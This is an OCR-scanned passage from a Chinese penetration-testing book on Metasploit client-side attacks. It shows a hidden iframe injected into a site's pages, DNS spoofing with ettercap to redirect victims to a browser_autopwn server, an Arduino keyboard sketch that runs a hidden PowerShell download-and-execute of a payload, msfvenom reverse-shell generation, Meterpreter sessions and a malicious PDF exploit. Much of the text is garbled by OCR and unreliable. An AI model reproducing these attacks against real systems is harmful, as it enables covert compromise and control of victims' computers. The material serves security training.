Web 命令 行 的 PHP 文件 。 为 了 执行 这 次 攻击 , 需要 在 index.php 或 者 选中 的 其 他 页 面 中 添加 如 下 代码 : 





<iframe src="ht 

















tp://192.168.10.107:80/" width=0 height=0 style-"hidden" 


frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> 








j 当 有 受害 者 访问 网 站 时 ， 上 再 
段 代码 包含 了 一 个 iframe 标签 ， 


诈 人 允许 用 户 对 
者 一 日 














个 文件 











, 


dae 


ET 








它 将 从 攻击 者 的 系统 
网 站 进行 访问 。 


访问 了 这 个 网 页 ，browser autopwn 将 会 


面 的 代码 就 会 自动 加 载 下 rame 中 的 恶意 








browser autopwn 模块 正常 运行 ; W 


动 它 。 

















K browser autopwn n 模块 
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JEF 








没 














msf auxiliary(browser autopwn) > set LHOST 192.168.10.107 
LHOST => 192. 
msf auxiliary(browser autopwn) > set SRVPORT 80 


SRVPORT => 8 


msf auxiliary(browser autopwn) > set URIPATH / 


URIPATH => / 


msf auxiliary(browser autopwn) > exploit 
[*] Auxiliary module execution completed 


[*] Setup 


[*] Starting exploit modules on host 192.168.10.107... 


168.10.107 


0 


























如 果 一 切 顺利 ,我 们 将 会 获得 在 





目标 系统 上 运行 的 Meterpreter。 这 











E 





诱 最 大 数量 的 受 
就 是 内 部 网 络 服务 器 的 用 





example-demo 


可 以 看 到 ， 


， 并 进入 到 他 们 的 系统 中 。 
^. ibl Dem moo 


在 进行 
者 浏览 





E 





VA SITZ. 





盒 测试 时 ， 这 种 方法 非常 
E 什 么 











意 网 站 时 会 发 4 








FT Du 


com, 


这 里 的 调用 是 由 192.168.10.107 发 起 的 ， 





DD, 








这 个 IP Hbi 


autopwn 服务 器 。 让 我 们 从 攻击 者 的 角度 来 看 看 这 个 过 程 。 





[*] 192.168.10.105 
[*] 192.168.10.105 
iIcMSA.jar 

[*] 192.168.10.105 
[*] 192.168.10.105 


java verifier field access - 
java jre17 reflection types - 


java rhino 
java atomicreferencearray - 


ay Type Violation Vulnerability 


[*] 192.168.10.105 

es). 

[*] 192.168.10.105 

*] 192.168.10.105 
] 192.168.10.105 


java_atomicreferencearray - 


java jrel7 reflection types - 


java jrel7 jmxbean - handLlii 


java verifier field access - 


code Verifier Cache Remote Code Execution 


] 192.168.10.105 


java verifier field access 


- Sending Applet. 


Sending jar 

handling request for /uEHZ/ow| 
jar 

Sending Java AtomicReferenceArr| 


Generated jar to drop (5125 byti 
handling request for /uEHZ/ 


ng request for /NcXYqzyENHt/ 
Sending Java Applet Field Byte| 





- Generated jar to drop (5125 by| 





E 在 顺利 地 进行 。 











MZS 





渗透 成 功 之 后 ，Meterpreter 访问 权限 就 会 5 


browser autopwn, Hi 


中 自动 加 载 browser autopwn。 我 们 需要 保存 这 


者 的 计算 机 上 运 
云 行 ， 可 以 使 用 如 下 命令 来 启 


这 种 渗透 思路 是 使 用 





E E 


a i 


运 们 。 

















我 们 必须 和 


P x 








目标 网 站 引 
了 用， 渗透 的 目标 

















其 实 就 是 我 们 的 browser 

















示 在 我 们 面前 。 
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7.1.3 5 DNS 欺骗 和 MITM 结合 的 browser autopwn 攻击 

我 们 希望 将 对 受害 者 系统 的 所 有 攻击 被 发 现 的 概率 降 到 最 小 ， 并 尽 可 能 不 引起 受害 者 的 注意 。 

现在 我 们 已 经 看 到 了 一 个 传统 的 browser autopwn 攻击 以 及 改进 后 针对 网 站 用 户 的 攻击 。 这 里 我 
们 受到 了 一 个 约束 ， 那 就 是 必须 要 通过 某 种 方式 将 陷阱 链接 发 送 给 受害 者 。 

在 这 次 攻击 中 ， 我 们 仍然 使 用 Metasploit 中 的 browser autopwn 模块 来 攻击 受害 者 ,但 是 使 用 
另 一 种 方式 一 一 不 再 向 受害 者 发 送 任何 链接 ， 而 是 等 待 他们 去 浏览 自己 喜欢 的 网 站 。 

这 种 攻击 只 能 在 局 域 网 环境 中 使 用 。 因 为 若 想 采用 这 种 方式 ， 首 先 需 要 执行 ARP EUR. ARP T. 
作 在 协议 层 的 第 二 层 ， 只 在 同一 个 广播 域 下 工作 。 但 如 果 可 以 通过 某 种 方式 来 修改 远程 受害 者 主机 的 
host 文件 ， 我 们 就 可 以 不 用 考虑 这 个 范围 的 限制 ， 这 通常 被 称 为 一 个 域 欺骗 攻击 。 

1. 使 用 DNS 劫持 欺骗 受害 者 

让 我 们 开始 吧 ! 首先 对 受害 者 发 起 一 个 ARP 毒化 攻击 ， 并 执行 DNS 查询 欺骗 。 因 此 ， 如 果 受 害 
者 试图 打开 一 个 常用 的 网 站 主页 , 例如 当前 使 用 人 数 最 多 的 http://google.com, 结果 却 是 打开 了 我 们 设 
ÉY browser autopwn 服务 的 陷阱 主页 ， 进 而 使 得 他 的 系统 遭 到 了 来 自 陷阱 网 站 的 攻击 。 

我 们 需要 首先 创建 一 个 DNS 毒化 列表 ， 这 样 当 受害 者 输入 一 个 域名 试图 打开 对 应 网 站 的 时 候 ， 
本 来 域名 http://www.google.com 所 指向 的 IP 地 址 就 会 被 替换 为 陷阱 网 站 的 IP 地址。 这 些 伪 造 的 DNS 
条 目 保 存在 下 列 文件 里 。 




































































































































































root@root:~# locate etter.dns 
/usr/local/share/videojak/etter.dns 
/usr/share/ettercap/etter.dns 


在 这 个 例子 中 , 我 们 使 用 当前 最 为 流行 的 ARP 毒化 工具 集合 , MILE esttercap。 首 先 ， 找 到 这 
个 文件 并 创造 一 个 伪造 的 DNS 列表 。 这 一 点 是 非常 重要 的 ， 因 为 当 受害 者 在 试图 打开 某 一 个 指定 网 
站 的 时 候 ， 该 域名 本 来 对 应 的 正确 IP 会 被 我 们 修改 的 伪造 IP 所 代替 。 为 了 实现 这 一 点 ， 需 要 修改 
etter.dns 文件 中 的 列表 ， 具 体 过 程 如 下 面 的 屏幕 截图 所 示 。 





















































rootQroot :~# nano /usr/share/ettercap/etter.dns 


我 们 需要 在 本 节 中 对 列表 中 的 内 容 做 以 下 修改 。 























google.com A 192.168.65.132]À 
microsoft.com A 198.182.196.56 
*.microsoft.com A  198.182.196.56 
www.microsoft.com PTR 198.182.196.56 











当 受 害 者 发 出 一 个 关于 域名 http://google.com 的 DNS 请 求 时 , 这 个 列表 就 会 把 攻击 者 计算 机 的 IP 
地 址 作为 响应 发 送 给 他 。 当 创建 完 列 表 之 后 ， 保 存 这 个 文件 并 且 使 用 命令 的 方式 打开 ettercap。 这 
个 过 程 如 下 图 所 示 。 














[rooteroot:~# ettercap -GE 





























这 个 命令 将 可 以 以 图 形 化 界面 的 形式 启动 ettercap， 启 动 的 界面 如 下 图 所 示 。 























下 一 个 步骤 是 选中 Sni 企 选项 卡 中 的 Unifed sniffng 选项 ， 然 后 选择 接口 eth0 作为 默认 接口 ， 如 下 
面 的 屏幕 截图 所 示 。 


























接 下 来 要 对 目标 网 络 范 围 内 的 TP 地址 进行 扫描 , 以 此 来 验证 哪些 主机 处 于 在 线 状态 。 受害 者 的 主 
机 和 网 关 应 该 也 在 这 些 主机 范围 内 ， 如 下 面 的 屏幕 截图 所 示 。 




















所 有 地 址 范围 内 的 主机 ， 都 会 被 扫描 并 根据 其 在 线 状态 进行 过 滤 。 这 样 所 有 网 络 中 在 线 的 主机 信 
息 都 会 按照 下 图 所 示 添 加 到 主机 列表 中 。 
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我 们 需要 导航 到 Hosts 选项 卡 , 然后 选择 Host List, 这 样 才能 打开 主机 列表 , 如 下 面 的 屏幕 截图 所 示 。 


























接 下 来 需要 将 网 关 的 地 址 添加 到 目标 2， 并 将 受害 者 的 地 址 添加 到 目标 1。 我 们 


以 后 就 将 网 关 看 


作 目 标 2， 将 受害 者 的 计算 机 看 作 目 标 1。 因 为 我 们 需要 截获 受害 者 发 往 网 关 的 通信 。 








RE, AA MITM 选项 卡 ， 然 后 在 其 中 选择 ARP Poisoning， 如 下 面 的 屏幕 截图 所 示 。 


























接 下 来 , 单 击 OK 后 继续 下 一 步 , 即 浏览 到 Start 选项 卡 ,然后 选择 Start Sniffing, À 


击 Start Sniffing 





选项 ， 这 时 将 会 输出 一 个 Starting Unifed sniffng 的 提示 信息 ， 如 下 图 所 示 。 
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接 下 来 我 们 要 激活 DNS 
如 下 面 的 屏幕 截图 所 示 。 























歇 骗 插件 程序 ,激活 的 步骤 是 从 Plugins 选项 卡 中 选择 Manage the plugins, 





双击 DNS spoof plug-in 以 激活 DNS 欺骗 。 这 个 插件 被 激活 之 后 将 会 发 送 伪 造 的 DNS 数据 ， 这 
些 数据 是 我 们 之 前 在 文件 etter.dns 中 修改 过 的 。 因 此 无 论 何 时 ， 只 要 受害 者 发 送 某 个 特定 网 站 域名 
的 DNS 请求， 攻击 就 会 伪造 一 个 响应 ,使 用 etter DNS 文件 中 假冒 的 DNS 条 目 来 代替 真实 的 条 目 。 





这 个 假冒 的 DNS 条 上 日 指向 设置 了 browser autopwn 服务 的 主机 的 IP。 因 此 ,受害 者 并 没有 进入 自己 















































原 计划 的 网 站 ， 而 是 进入 了 运行 着 browser autopwn 服务 的 那个 陷阱 网 站 。 


fed dn 
Rur attack aga 


plugin template (for develc 


接 下 来 在 80 端口 启动 陷阱 网 站 。 








msf > use auxiliary/server/browser autopwn 

msf  auxiliary(browser autopwn) > set LHOST 192.168.65.132 
LHOST => 192.168.65.132 

msf  auxiliary(browser autopwn) > set SRVPORT 80 

SRVPORT -» 80 

msf  auxiliary(browser autopwn) > set URIPATH / 

URIPATH => / 

msf auxiliary(browser autopwn) > expLoit 国 








现在 来 看 看 当 受 害 者 试图 打开 http:/google.com/ 时 都 发 生 了 什么 。 





À Loading - Microsoft Internet Explorer 


File Edit View Favorites Tools Help 


z w 


[x) a f P; ) Search Jg Favorites A ( j- em iy, 


Address E http://goagle.com 
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同时 也 从 攻击 者 的 角度 看 一 下 是 否 获取 了 一 些 有 趣 的 东西 。 


[*] 192.168.65.129 Reporting: (:os name-»"Microsoft Windows", :os flavor 
=>"XP", :0s sp-»"SP2", :os lang-»"en-us", :arch-»"x86") 

[*] Responding with exploits 

[*] Sending MS03-020 Internet Explorer Object Type to 192.168.65.129:1054. 





[-] Exception handling request: Connection reset by peer 
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.65.129:1055. 


[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.65 
.129:1056 (target: IE 6 SPO-SP2 (onclick))... 

[*] Sending stage (752128 bytes) to 192.168.65.129 

[*] Meterpreter session 1 opened (192.168.65.132:3333 -> 192.168.65.129:10 
58) at 2013-11-07 12:08:48 -0500 

[*] Session ID 1 (192.168.65.132:3333 -» 192.168.65.129:1058) processing I 
nitialAutoRunScript 'migrate -f' 

[*] Current server process: iexplore.exe (3216) 

[*] Spawning a notepad.exe host process... 

[*] Migrating into process ID 3300 

msf  auxiliary(browser autopwn) > [*] New server process: notepad.exe (3300) 








看 起 来 不 错 吧 ! 我 们 得 到 了 在 目标 后 台 打 开 的 Meterpreter 连接 , 这 意味 着 成 功 获取 了 受害 者 的 管 














理 权限 。 但 是 在 整个 过 程 中 ， 我 们 并 没有 向 受害 者 发 送 任何 链接 ， 这 正 是 这 种 攻击 方法 的 最 大 优势 ， 




















在 因为 我 们 毒化 了 本 地 网 络 的 DNS 条 目 。 然 而 ， 如 果 想 在 一 个 广域网 中 实现 这 种 攻击 ， 
受害 者 的 主机 文件 。 XEFFSRERER BUE UE 条 指定 的 URL Hj, feb ENLA H 
URL 定向 到 那个 恶意 autopwn 服务 器 上 。 这 个 过 程 如 下 面 的 屏幕 截图 所 示 。 























msf auxiliary(browser autopwn) > sessions -i 


Active sessions 


Id Type Information 


1 meterpreter x86/win32  NIPUN-DEBBE6F84XAdministrator @ NIPUN-DEBBE6F84 
192.168.65.132:3333 -> 192.168.65.129:1058 


ms auxiliary(browser autopwn) » sessions -i 1 
[*] Starting interaction with 1... 


meterpreter » os 


Computer NIPUN-DEBBE6F84 

os : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 

System Language : en US 

Meterpreter : x86/win32 


meterpreter > B 








就 需要 修改 
目 将 会 将 这 个 


还 有 许多 其 他 技术 可 以 与 Metasploit 的 攻击 技术 结合 使 用 ， 从 而 创造 出 更 高 级 的 攻击 手段 。 





2. 使 用 Kali NetHunter 实现 浏览 器 渗透 














之 前 已 经 演示 了 如 何 对 位 于 同一 子 网 内 的 设备 进行 DNS 查询 欺骗 。 现 在 我 们 使 用 安装 有 

















NetHunter 系统 的 Android 设备 来 完成 这 个 任务 。 为 了 和 避免 被 受害 者 发 现 ,我 们 不 再 像 前 
样 使 用 像 谷歌 之 类 的 指定 页 面 。 在 这 次 的 攻击 中 ,我 们 将 会 使 用 Kali NetHunter 中 的 cSploit 工具， 对 




















目标 所 浏览 的 所 有 页 面 进行 脚本 注入 攻击 。 首 先 先 来 了 解 一 下 cSploit 的 工作 界面 。 





ji 的 例子 中 那 
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cSploit 
这 里 假定 我 们 的 目标 是 DESKTOP-PESQ21S。 点 击 它 就 可 以 打开 一 个 子 菜单 ， 里 面 列 出 了 所 有 的 
选项 o 


m © P% RET 


€ cSploit > DESKTOP-PESQ21S 
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在 这 个 菜单 中 选中 MITM ,然后 依次 在 后 面 出 现 的 界面 中 选中 Script Injection 和 CUSTOM CODE, 
最 后 修改 的 内 容 如 下 图 所 示 。 


Javascript 


Enter the Javascript code to inject : 


«script type-"text/javascript'» 
alert(This site has been hacked 
bv Nipun’); 


nz] 5] fo] e] [o] o [o |en 
四 加 四 四 加 加 四 四 加 站 加 
nmnunnnnnr 
mnnnpmnpnnoÁnRk" 
ed s [sv 


M (©) 口 轿 











这 里 我 们 选择 使 用 自行 编写 脚本 的 方式 进行 攻击 , 但 实际 上 只 对 默认 的 脚本 做 一 点 修改 。 接 下 来 
要 做 的 就 是 将 写 好 的 脚本 注入 到 目标 浏览 的 任何 网 页 中 去 。 好 了 ， 现 在 只 需要 单 击 OK 就 可 以 启动 这 
次 攻击 了 。 每 当 受 害 者 打开 一 个 新 的 页 面 ， 他 都 会 看 到 如 下 所 示 的 弹出 框 。 









































Nipun -— IRI x 
J NipunJaswal's Officia E. x $ Y 


X Q |© www.nipunjaswal.com xs ouo 


ii Apps [Ì HackerAcademy Mc. & Mynl " N s Call - Fake [ _AllindiaCongress.Co 
From www.nipunjaswal.com 


This site has been hacked by Nipun 











这 次 攻击 显然 成 功 了 ,但 是 仍 有 待 完善 。 例 如 ， 我 们 可 以 创建 一 些 带 有 浏览 器 自动 攻击 服务 的 
JavaScript 代码 ， 不 过 我 打算 留 给 你 们 自行 完成 。 当 你 们 在 创建 JavaScript 代码 的 时 候 ， 会 接触 到 更 多 
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$ 








的 技术 ， 例 如 基于 JavaScript 的 cookie 记录 器 。 好 了 ， 当 日 标 系统 运 
JavaScript 代码 之 后 ,我们 就 会 看 到 如 下 图 所 示 的 输出 。 


行 了 带 有 浏 





览 器 自动 攻击 服务 的 









回 Loading x 





ii Apps [Ì Hacker Academy Mc 
root@) 


File Edit View Search Terminal Help 
[*] Server started. 

[*] Starting handler for windows/meterpre 
[*] Starting handler for generic/shell re 
[*] Started reverse TCP handler on 192.16 
[*] Starting handler for java/meterpreter 
[*] Started reverse TCP handler on 192.16; 
[*] Started reverse TCP handler on 192.16 
































[*] --- Done, found exploit modules 


[*] Using URL: http://0.0.0.0:8080/ 

[*] Local IP: http://192.168.10.101:8080/ 
[*] Server started. 

[*] Handling '/' 

[*] Handling '/wdinfo.php' 

[*] 404ing /wdinfo.php 

[*] Handling '/?sessid-V2luZG93czplbmRlzml 
d 
[*] JavaScript Report: Windows:undefined: 
:Chrome:65.0.3325.181: 

[*] Reporting: ("os.product"-»"Windows", " 
", "os.certainty"-»"0.7") 

[*] Responding with 6 exploits 




















加 view-sourceswww.nipun;- x 


e C û | © wwwnipunjaswal.com 


WS Myntra I Oops! Google CI 

































够 神奇 吧 ? NetHunter 和 cSploit 掌控 了 一 切 。 如 果 由 于 某 导致 你 不 








话 ， 你 还 可 以 考虑 利用 Redirect 功能 将 目标 引 向 一 个 错误 的 地 址 ， 





Redirection 


Enter redirection details below: 








创建 JavaScript 代码 的 





这 个 eum 


到 所 示 。 
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单 击 OK 按钮 之 后 ， 无 论 目标 在 浏览 器 中 输入 什么 地 址 ， 他 所 看 到 的 页 面 都 将 是 我 们 构造 的 自动 
渗透 服务 器 上 8080 端口 提供 的 主页 。 





7.2 Metasploit 和 Arduino—— “致命 ”搭档 


基于 Arduino 的 微 控制 器 板 是 一 种 体积 很 小 但 功 角 S Gus 大 的 硬件 ， 可 以 成 为 渗透 测试 中 的 一 款 
“致命 ”武器 。 有 一 些 Arduino 板 还 支持 键盘 和 鼠标 库 ， 这 意味 着 它们 可 以 成 为 HID 设备 。 

















因此 这 些 体积 很 小 的 Arduino 板 就 可 以 悄悄 地 执行 人 类 行为 ， 例 如 敲 击 键盘 、 移 动 和 点 击 鼠 标 以 


及 各 种 其 他 行为 。 在 本 市 中 ， 我 们 将 一 个 Arduino Pro 微 板 模拟 成 键盘 ， 然 后 从 远程 站 点 下 载 并 执行 
恶意 攻击 载 答 ,不 过 需要 注意 的 是 , 这 些微 板 上 没有 足够 的 存储 空间 , 所 以 必须 从 远程 下 载 攻 击 载荷 。 




















ò 如 果 想 要 使 用 HID 设备 进行 渗透 测试 ,也 可 以 考虑 使 用 USB Rubber Ducky 或 Teensy。 


你 可 以 在 一 些 很 受 欢迎 的 购物 网 站 ( 如 Aliexpress.com 等 ) 上 可 以 用 不 到 4 美元 购买 到 Arduino Pro 
微 板 。 所 以 ， 比 起 Teensy 和 USB Rubber Ducky, Arduino Pro 微 板 可 便宜 多 了 。 




















使 用 编译 软件 对 Arduino 进行 配置 也 并 不 困难 。 如 果 你 已 
个 练习 十 分 容易 。 


如 果 想 获取 关于 设置 和 启动 Arduino 的 更 多 信息 ,请 访问 地 址 https:/www.rduino.cc/en/ 
Guide/Windows。 


























经 具备 了 一 些 编程 经 验 的 话 ， 会 发 现 这 

















下 面 是 需要 烧 录 到 Arduino 芯片 上 的 代码 : 
#include<Keyboard.h> 

void setup() { 

delay (2000); 

type (KEY, LEFT GUI, false); 
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称 ， 


利用 keyboard 库 的 press O FR 





行 指令 的 时 候 , 才 会 使 用 到 10 


type('d',false); 

Keyboard.releaseAl11(); 

delay (500); 

type(KEY LEFT GUI,false); 

type('r',false); 

delay (500); 

Keyboard.releaseAl11(); 

delay (1000); 

print(F("powershell -windowstyle hidden (new-object 


System.Net.WebClient).DownloadFile('http://192.168.10.107/pay2.exe', 


NWmal.exe'); Start-Process "$STEMP$NWmal.exe"")); 

delay (1000); 

type (KEY, RETURN, false); 

Keyboard.releaseAl11(); 

Keyboard.end(); 

} 

void type(int key, boolean release) ( 
Keyboard.press(key); 

if(release) 
Keyboard.release(key); 

} 

void print (const __FlashStringHelper *value) ( 
Keyboard.print (value); 

j 

void loop(){} 


'STEMP$ 


这 段 代码 中 有 一 个 名 为 type 的 函数 ， 这 个 函数 需要 两 个 参数 ， 一 个 为 要 按 下 或 者 释放 的 键 的 名 
男 一 个 为 是 否 需要 释放 这 个 键 。 接 下 来 出 现 的 函数 是 print ， 它 将 替换 默认 的 print 打印 函数 ， 



































数 直 接 输 出 文本 。Arduino 有 两 个 主要 函数 ， 分 别 是 loop 和 setup。 
因为 这 里 只 需 下 载 和 执行 一 次 攻击 载荷 ， 所 以 将 所 有 代码 都 放置 在 了 setup 函数 中 。 当 需要 重复 执 














op 函数 。qelay UM sleep 函数 功能 相同 ,都 是 训 


程序 在 指定 时 间 





内 (单位 为 毫秒 ) 暂停 执行 。type (KEY_LEFT_GUI，false) ;语句 表示 要 按 下 目标 系统 键盘 左 侧 的 
win 键 且 一 直 保持 按 下 的 状态 , 所 以 我 们 要 将 false 作为 释放 的 参数 。 接 下 来 使 用 相同 的 方法 按 下 d 键 。 
现在 我 们 已 经 按 下 了 两 个 键 ， 即 Windows + d t£ ( 显示 桌面 操作 的 快捷 键 )。 当 我 们 执行 Keypoara. 


releaseAll () 函数 时 ， 












































目标 系统 就 会 执行 Windowsa 命令 ， 从 而 将 桌面 上 的 所 有 窗口 最 小 化 。 


QD 可 以 访问 https://www.arduino.cc/en/Reference/KeyboardModifier 获 取 更 多 关于 Arduino 


的 keyboard 库 的 信息 。 








通过 同样 的 方法 使 用 下 一 个 组 合 键 来 显示 运行 命令 框 。 在 运行 命令 框 中 输入 Powershell MS, 

从 远程 站 点 下 载 攻 击 载荷 ， 也 就 是 192.168.10.107/pay2.exe。 然 后 将 这 个 攻击 载荷 保存 在 Temp 
文件 夹 中 ,并 从 这 里 执行 -输入 命令 后 ,需要 按 回 车 键 来 执行 这 个 命令 .这 一 点 可 以 通过 将 KEY_RETURN 
作为 按键 值 传递 给 函数 来 实现 。 下 面 来 看 看 如 何 对 Arduino 板 实现 写 人 操作 。 
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File Edit Sketch 


Tools Help 





sketch augi6a 














Auto Format Ctri«T 
Archive Sketch 
Fix Encoding & Reload 
Serial Monitor 


Serial Plotter 


Ctri-Shift- M 
Ciri«Shift-L 











Boards Manager... 
Arduino AVR Boards 
Arduino Yün 
Arduino/Genuino Uno 





Port 


Programmer; "AVRISP mklI" 3 
Burn Bootloader 





Arduino Duemilanove or Diecimila 
Arduino Nano 

Arduino/Genuino Mega or Mega 2560 
Arduino Mega AD 


T 





Arduino/Genuino Micro 
Arduino Esplora 
Arduino Mini 

Arduino Ethernet 
Arduino Fio 

Arduino BT 

LilyPad Arduino USB 
LilyPad Arduino 
Arduino Pro or Pro Mini 
Arduino NG or older 
Arduino Robot Control 
Arduino Robot Motor 
Arduino Gemma 

















如 上 图 


板 通信 的 端口 。 


所 示 , 单 击 菜单 栏 上 的 Tools 选项 , 选择 我 们 使 








型 


mE 

















用 的 Arduino 板 类 





, 然后 再 选择 和 Arduino 













h | Arduino 1.6.8 
File Edit Sketch Tools Help 
Auto Format 
Archive Sketch 
Fix Encoding & Reload 
Serial Monitor 
Serial Plotter 


Board: "Arduino Leonardo" 
Port: "COM3 (Arduino Leonardo)" 


Programmer: "AVRISP mklI" 
Burn Bootloader 


d ERES 


Ctrl+Shift+M 
Ctrl+Shift+L 


> 


| Serial ports 


,BN COM3 (Arduino Leonardo) | 












type (KEY_RETURN, 
Keyboard. 
Kegboard.e 





p powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(' 








/-sgtatham/putty/0.64/x86/putty.exe', '$TEMP$\\tutty.exe'); Start-Process \"$TEMP$\\tutty.exe\"")); 








Je 


202 第 7 章 客户 端 渗透 





接 下 来 按 下 一 按钮 ， 就 可 以 将 程序 写 到 Arduino 板 上 。 


€9 hh | Arduino 1.6.8 x 口 x 








File Edit Sketch Tools Help 





Keyboard.h> 

tup() { 

delay (2000); 

type (KEY LEFT GUI, false); 

type('d', false); 

Keyboard.releaseAll(): 

delay (500); 

type(KEY LEFT GUI, false); 

type('r',fal 

delay(500); 

Keyboard.releaseAll(); 

delay (1000); 

print(F("powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http:// 

delay (1000); 

type(KEY RETURN, false); 

Keyboard.releas 

Keyboard.end () ; 

] 

void type(int key, b 
Keyboard.press (key| 
if (release) 

Keyboard. release (key) ; 












se); 
























现在 的 Arduino 已 经 做 好 搬 人 受害 者 系统 的 准备 了 ， 更 棒 的 是 它 还 将 自己 伪装 成 了 一 个 键盘 ， 因 
此 你 无 须 担心 被 发 现 。 不 过 你 的 攻击 载荷 必须 经 过 充分 的 处 理 ， 才 能 逃 过 杀毒 软件 的 检查 。 


然后 像 下 图 般 搬 入 Arduino 设备 。 
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插入 设备 之 后 的 短 短 几 毫秒 内 ,攻击 载 荷 就 已 下 载 完毕 ， 并 在 目标 系统 执行 。 然 后 就 可 以 查看 到 
如 下 图 所 示 的 信息 。 


[*] Started reverse TCP handler on 192.168.10.107:5555 

[*] Starting the payload handler... 

[*] Sending stage (1188911 bytes) to 192.168.10.105 

[*] Meterpreter session 3 opened (192.168.10.107:5555 -> 192.168.10.105:12668 
) at 2016-07-05 15:51:14 +0530 

















meterpreter » pis 


Computer DESKTOP -PESQ21S 

os : Windows 10 (Build 10586). 
Architecture : x64 

System Language : en US 

Domain : WORKGROUP 

Logged 0n Users : 2 

Meterpreter : x64/win64 


meterpreter > 
下 面 来 看 看 如 何 生成 攻击 载荷 。 


root@mm: -# msfvenom -p windows/x64/meterpreter/reverse tcp LH0ST-192.168.10.107 
LPORT-5555 -f exe » /var/www/html/pay2.exe 

No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 
ad 

No Arch selected, selecting Arch: x86 64 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 510 bytes 




















rootümm:-£ service apache2 start 
root(amm: ~# 


























我 们 已 经 生成 了 一 个 适用 于 64 位 Windows 操作 系统 的 Meterpreter 攻击 载荷 ， 它 将 会 主动 回 连 
到 我 们 系统 的 5555 端口 。 将 这 个 攻击 载荷 保存 在 Apache 文件 夹 内 ， ABAMI Apache, $Z 
下 来 只 需 启动 渗透 模块 的 handler 来 监听 到 达 5555 端口 的 连接 即 可 ， 这 个 过 程 如 下 图 所 示 。 



































msf exploit(handler) > back 
msf > use exploit/multi/handler 
p exploit(handler) > set payload windows/x64/meterpreter/reverse t 
f exploit(handler) » set LPORT 5555 
sf exploit(handler) > set LHOST 192.168.10.107 
sf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.107:5555 
[*] Starting the payload handler... 








在 这 里 我 们 见识 到 了 一 种 全 新 的 攻击 手段 一 一 只 需要 一 个 廉价 的 微 控 制 器 ， 就 可 以 获得 一 个 
Windows 10 系统 的 控制 权限 。Arduino 是 一 种 很 有 趣 的 工具 ， 我 也 建议 你 去 阅读 一 些 关 于 Arduino、 
USB Rubber Ducky .Teensy 和 Kali Net Hunter 等 工具 的 资料 .你 可 以 在 任何 的 Android 手 机 使 用 Kali Net 
Hunter 来 效仿 同样 的 攻击 手段 。 


有 关 Teensy 的 更 多 信息 ， 请 访问 https:/www.pjrc.com/teensy/。 














有 关 USB Rubber Ducky 的 更 多 信息 ， 请 访问 http://hakshop.myshopify.com/products/ 
Usb-rubber-ducky-deluxe。 
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7.3 基于 各 种 文件 格式 的 渗透 攻击 


这 一 


7.3.1 





节 将 会 涵盖 对 受害 者 基 
提供 一 个 目标 系统 的 Meterpreter 或 者 shell Ht 
fll PDF 文件 对 目标 进行 渗透 。 


基于 PDF 文件 格式 的 渗透 攻击 


基于 PDF 文件 格式 的 渗透 模块 会 触发 各 种 PDF 阅读 器 和 解析 器 的 漏洞 。 当 这 些 包 含 攻击 载荷 的 
PDF 文件 执行 时 , 就 会 向 攻击 者 提供 一 个 Meterpreter 或 者 命令 








之 前 ， 先 来 查看 一 下 渗透 要 利用 





E 于 各 种 文件 格式 的 渗透 攻击 。 














的 相关 漏洞 以 及 环境 的 细节 。 


制 权限 。 在 下 一 节 中 ， 











一 旦 执行 这 个 恶意 文件 ， 它 就 会 


向 我 们 





我 们 将 会 


讲解 如 何 使 用 恶意 文档 


行 控制 权限 。 但 是 在 动手 实现 这 种 攻击 







































































测试 案例 S x 

漏洞 这 个 模块 利用 了 Nitro 和 Nitro Pro PDF Reader 11 中 的 漏洞 ， 该 漏洞 是 由 于 引用 了 不 安全 的 
JavaScript API 造 成 的 。 API 中 的 saveas () 函数 允许 攻击 者 将 任意 文件 写 入 文件 系 
统 中 ， 而 Iaunchurl O 函数 则 允许 攻击 者 在 文件 系统 上 执行 本 地 文件 ， 并 绕 过 安全 对 话 

目标 渗透 系统 Windows 10 

软件 版 本 Nitro Pro 11.0.3.173 

CVE 信息 https://www.cvedetails.com/cve/CVE-2017-7442/ 

渗透 模块 的 细节 exploit/windows/fileformat/nitro_reader jsapi 








为 了 能 通过 这 个 漏洞 进行 渗透 攻击 ,首先 创建 一 
































恶意 PDF 文件 ,然后 将 这 个 文件 发 送 给 受害 者 。 

















当 受 害 者 试图 打开 这 个 恶意 PDF 文件 时 ， 我 从 大 可 山大 二- HUE P d AC PH 





Meterpreter 15 


制 行 或 者 命令 行 。 接 下 来 尝 


< 试 构建 一 个 恶意 PDF 文件 。 








nsf exploit(windows/fileformat/nitro reader jsapi) > show options 


FILENAME msf .pdf 


SRVHOST — 0.0.0.0 
SRVPORT 8080 
URIPATH  / 


Name 

EXITFUNC process 
LHOST 192.168.1.14 
LPORT 4444 


Exploit target: 


© Automatic 


Current Setting Required Description 


The file name. 


The local host to listen on. This must be an address on the local machine or 0.0.0.0 


Module options (exploit/windows/fileformat/nitro reader jsapi): 


The local port to listen on. 


The URI to use. 


Payload options (windows/meterpreter/reverse tcp): 


Current Setting Required Description 


Exit technique (Accepted: '' 


The listen address 


The listen port 


, seh, thread, process, none) 

















接 下 来 需要 将 参数 LHOST 设置 为 我 们 使 
SRVPORT 的 值 。 鉴 于 本 实验 是 出 于 验证 的 目的 ，SRVPORT 端 




















口 的 值 仍然 使 月 











用 主机 的 IP 地 址 。 另 外 ， 我 们 可 以 自行 设置 LPORT 和 
有 默认 值 8080, LPORT 的 
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值 设 置 为 4444。 按 照 如 下 所 示 运 行 这 个 模块 。 








Imsf exploit(windows/fileformat/nitro reader jsapi) > msf.pdf stored at /root/.msf4/local/msf.pdf 
[*] Using URL: http://0.0.0.0:8080 

[*] Local IP: http://192.168.1.14:8080 

[*] Server started. 











接 下 来 我 们 可 以 使 用 各 种 手段 将 这 个 msfpdf 文件 发 送 给 受害 者 ,例如 将 文件 上 传 到 网 站 ， 然 后 
将 这 个 链接 发 送 给 受害 者 ， 或 者 将 文件 放 在 USB 存储 设备 上 ， 再 或 者 将 其 制作 成 一 个 压缩 文件 ， 然 
后 通过 电子 邮件 传播 。 不 过 这 里 出 于 演示 的 目的 ， 我 们 将 这 个 文件 上 传 到 Apache 服务 右上。 一旦 受 
